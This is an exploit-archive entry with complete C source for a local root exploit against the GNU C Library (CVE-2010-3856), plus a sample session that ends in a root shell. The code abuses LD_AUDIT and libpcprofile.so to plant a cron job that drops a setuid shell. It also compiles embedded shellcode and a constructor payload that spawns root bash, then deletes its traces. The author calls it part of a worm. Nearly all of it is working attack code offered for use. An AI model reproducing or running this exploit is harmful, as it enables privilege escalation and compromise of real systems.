GNU C Library local root (uid=0,gid=0) Exploit

2010-12-05T00:00:00
ID 1337DAY-ID-15048
Type zdt
Reporter devilzc0de
Modified 2010-12-05T00:00:00

Description

Exploit for linux platform in category local exploits

                                        
                                            ==============================================
GNU C Library local root (uid=0,gid=0) Exploit
==============================================

GNU C Library  local root (uid=0,gid=0) exploit
bug found by tavis ormandy
exploit code by devilzc0de
software url: http://www.gnu.org/software/libc/
Category: local
tested on
sh-3.2# cat /etc/issue
Debian GNU/Linux 5.0 \n \l

[code]
/**
#Exploit Title: GNU C Library  local root (uid=0,gid=0) exploit
#date: 04-12-10
#author: devilzc0de
#bugs found by: Tavis Ormandy ([email protected])
# Tested on: Debian GNU/Linux 5.0
#CVE: 2010-3856
#vulnerable : GNU C library
a basic exploit made by: devilzc0de  (www.devilzc0de.org)
special thanks to all devilzc0de crews and members, glodhaxors crews and members
tis is part of my worm (currently making dual os worm for 7 months)
[email protected]:~/sploit$ id
uid=1002(mywisdom) gid=1001(mywisdom) groups=1001(mywisdom)
[email protected]:~/sploit$ ./glibc


GLIBC local privilege escalation exploit

Bugs found by Tavis Ormandy

made by: devilzc0de.org

ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[+]waiting for dropped suid shell from our cron daemon, please wait ...
sh-3.2# id
uid=0(root) gid=0(root) groups=1001(mywisdom)
sh-3.2#
**/
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <unistd.h>
 void salam()
 {
    printf("\n\nGLIBC local privilege escalation exploit\n");
    printf("\nBugs found by Tavis Ormandy\n");     
    printf("\nmade by: devilzc0de.org\n\n");
 }
 
void eksplo1()
 {
int i;
struct stat bufer;
umask(0);
bikin_payload1();
 popen("dpkg -S /lib/libpcprofile.so","r");
 if(stat("/lib/libpcprofile.so",&bufer)!=0)
     {
      eksplo2();     
     }
     else
     {
             popen("LD_AUDIT='libpcprofile.so' PCPROFILE_OUTPUT='/etc/cron.d/w00t' ping","r");
     }
 
 if(stat("/etc/cron.d/w00t",&bufer)!=0)
     {
       eksplo2(); 
     }
     else
     {
        if(stat("/tmp/suidshell",&bufer)!=0)
            { 
           exit(1);
          }
        else
        {
                    popen("echo '* * * * * root cp /bin/dash /tmp/gotroot; chmod u+s /tmp/gotroot\n' > /etc/cron.d/w00t", "r");
   
        }
          printf("[+]waiting for dropped suid shell from our cron daemon, please wait ...\n");
          usleep(60000000);
 
         system("/tmp/./gotroot -c /tmp/./suidshell");
     }
}
int bikin_payload1()
 {
     
  FILE *fp2;
   const char *str2 ="char shellcode[] =\"\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80\";int main(){int (*f)() = (int(*)())shellcode;f();}";
           fp2 = fopen("suid.c", "w"); 
        fwrite(str2, 1, strlen(str2), fp2);
        fclose(fp2);
       popen("gcc -o /tmp/suidshell suid.c","r");
  
}

int bikin_payload2()
 {
     
  FILE *fp;
   const char *str ="void __attribute__((constructor)) init(){ setuid(0);system(\"/bin/bash\");}";
    fp = fopen("payload.c", "w");
        fwrite(str, 1, strlen(str), fp);
    fclose(fp);
    popen("gcc -w -fPIC -shared -o /tmp/exploit payload.c","r");


}

void il_fil_de()
 {
    struct stat buf;
       if(stat("payload.c",&buf)==0)
      {
          remove("payload.c");
      }
       if(stat("suid.c",&buf)==0)
      {
          remove("suid.c");
      }
        if(stat("/tmp/exploit",&buf)==0)
      {
              
          remove("/tmp/exploit");
      }
     
 }
int eksplo2()
 {
      
     remove("/tmp/exploit");
    popen("mkdir /tmp/exploit;ln /bin/ping /tmp/exploit/target","r");
        popen("exec 3< /tmp/exploit/target","r");
     remove("/tmp/exploit");
         
                   bikin_payload2();
              
                     popen("LD_AUDIT=\"\\$ORIGIN\" exec /proc/self/fd/3","r");
               
}


int main(int argc,char **argv[])
 {
   
    struct stat buf;
     salam();
     il_fil_de();
    mkdir("/tmp/exploit",0777);
   
      if(stat("/etc/cron.d",&buf)!=0)
          {
           eksplo2();
      } 
      else
      {
           eksplo1();         
      }
 }
[/code]



#  0day.today [2018-02-19]  #